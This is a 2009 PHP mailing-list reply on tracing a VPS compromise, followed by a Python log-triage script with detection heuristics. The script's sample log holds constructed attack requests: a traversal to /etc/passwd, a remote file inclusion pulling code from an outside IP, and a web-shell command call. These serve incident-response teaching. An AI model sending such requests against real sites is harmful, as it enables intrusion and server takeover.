On Fri, Sep 11, 2009 at 2:37 PM, Randal Rust <randalr...@gmail.com> wrote:
> > "Your VPS has been either hacked or an insecure script has been used
> > to upload stuff. We have tar'ed up the data that was being used
> > (/tmp/b.tar.gz). You need to have your developer take a look at your
> > site's code to determine any vulnerabilities."
>
> To which I responded, "OK, assume that we believe all of our scripts
> are secure. In looking at the logs, how do I pinpoint that someone
> is/was trying to upload something?"
>
> Tech support was less than helpful after that. So I pose the question
> to the list. How do I pinpoint the issue? There are about five domains
> running on the site, and we did not have any issues until we upgraded
> a ZenCart install for one of the sites.

They tar'd up the data from where? It might help you to know what directory it was uploaded to. Although a clever rootkit would cover its tracks, a clever kit wouldn't take down your server.

But really, the problem could be anywhere in the system. Was the OS up to date? Latest version of PHP? Anything hand-compiled that hadn't been updated in a long time? Are there FTP accounts (unencrypted)? Anyone lazy about their passwords?

There are a lot of ways for a box to get hacked. But as Tim just pointed out, it's usually something simple and obvious, like connecting to FTP from Starbucks or emailing a password from an internet cafe while on vacation.

_______________________________________________
New York PHP User Group Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
http://www.nyphp.org/show_participation.php
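The question Randal actually asks (how to pinpoint an upload attempt in the web logs) is answerable from the access logs plus the one clue the host did give, the tar'd-up data. Below is an added example, not code from the thread or from ZenCart: it parses Apache/Nginx combined-format log lines, flags requests that commonly precede a dropped file (a PHP script requested from a directory that should only hold images or uploads, path traversal, a remote URL passed as a parameter, a POST/PUT aimed at such a directory), and pulls every request within a few minutes of the modification time of the dropped file. The log lines, IP addresses, paths and the `DROP_TIME` value are all constructed for illustration; `STATIC_DIRS` is an assumption about a typical PHP shop layout and should be adjusted to the five vhosts actually on the box.

```python
"""
Added example (not from the thread): triage a combined-format access log for
requests that typically precede a dropped file, and pull the requests that
landed around the modification time of the artifact the host tar'd up.
All log lines, addresses, paths and times below are constructed.
"""
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Apache/Nginx "combined" format; trailing referer and user-agent are ignored.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumption: these directories should only ever serve static content.
STATIC_DIRS = ('/images/', '/upload/', '/uploads/', '/cache/', '/pub/')
PHP_EXT = ('.php', '.phtml', '.php5')


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec


def suspicious_reasons(rec):
    """Heuristics for a request worth a second look; returns [] for benign ones."""
    reasons = []
    raw = rec['path']
    path = raw.split('?', 1)[0].lower()
    if path.endswith(PHP_EXT) and any(d in path for d in STATIC_DIRS):
        reasons.append('PHP script requested from a static/upload directory')
    if '..' in raw or '%2e%2e' in raw.lower():
        reasons.append('path traversal in request')
    if re.search(r'[?&][a-z_]+=https?://', raw, re.I):
        reasons.append('remote URL passed as a parameter (RFI pattern)')
    if rec['method'] in ('POST', 'PUT') and any(d in path for d in STATIC_DIRS):
        reasons.append('write method aimed at a static directory')
    return reasons


def triage(lines):
    """Return [(record, reasons)] for every parseable line that trips a rule."""
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec:
            reasons = suspicious_reasons(rec)
            if reasons:
                flagged.append((rec, reasons))
    return flagged


def hits_near(lines, mtime, minutes=2):
    """Requests within +/- `minutes` of `mtime`, e.g. the mtime of a file
    extracted from the host's /tmp/b.tar.gz (see `ls --full-time`)."""
    lo, hi = mtime - timedelta(minutes=minutes), mtime + timedelta(minutes=minutes)
    recs = (parse_line(ln) for ln in lines)
    return [r for r in recs if r and lo <= r['ts'] <= hi]


def top_sources(flagged):
    """Count flagged requests per client IP; the attacker usually tops the list."""
    return Counter(rec['ip'] for rec, _ in flagged)


# Constructed sample log: one benign browser, one probing client.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2009:03:14:02 -0400] "GET /store/index.php?main_page=index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2009:03:20:41 -0400] "GET /store/index.php?main_page=../../../../etc/passwd HTTP/1.1" 404 310 "-" "curl/7.19"
198.51.100.23 - - [10/Sep/2009:03:21:05 -0400] "GET /site2/lib/init.php?path=http://203.0.113.99/x.txt HTTP/1.1" 200 88 "-" "curl/7.19"
198.51.100.23 - - [10/Sep/2009:03:22:17 -0400] "POST /store/images/upload.php HTTP/1.1" 200 42 "-" "curl/7.19"
198.51.100.23 - - [10/Sep/2009:03:22:19 -0400] "GET /store/images/b.php?cmd=id HTTP/1.1" 200 77 "-" "curl/7.19"
203.0.113.7 - - [10/Sep/2009:03:30:00 -0400] "POST /store/index.php?main_page=shopping_cart HTTP/1.1" 200 6000 "-" "Mozilla/5.0"
"""

# Constructed: pretend this is the mtime of a file found in /tmp/b.tar.gz.
DROP_TIME = datetime(2009, 9, 10, 3, 22, 19, tzinfo=timezone(timedelta(hours=-4)))

if __name__ == '__main__':
    lines = SAMPLE_LOG.splitlines()
    for rec, reasons in triage(lines):
        print(rec['ts'].isoformat(), rec['ip'], rec['method'], rec['path'],
              '->', '; '.join(reasons))
    for rec in hits_near(lines, DROP_TIME, minutes=1):
        print('near drop time:', rec['ip'], rec['method'], rec['path'])
    print(top_sources(triage(lines)).most_common(1))
```

In practice you would run `triage()` over the access log of each of the five vhosts (the dropped file's mtime from `stat` or `ls --full-time` on the extracted tarball tells you which minute to look at first), then look at everything that IP did before and after. Since the reply above raises FTP, check the FTP transfer log for the same window too: a file that appears on disk with no matching web request usually arrived over FTP or SSH with a stolen password rather than through a script.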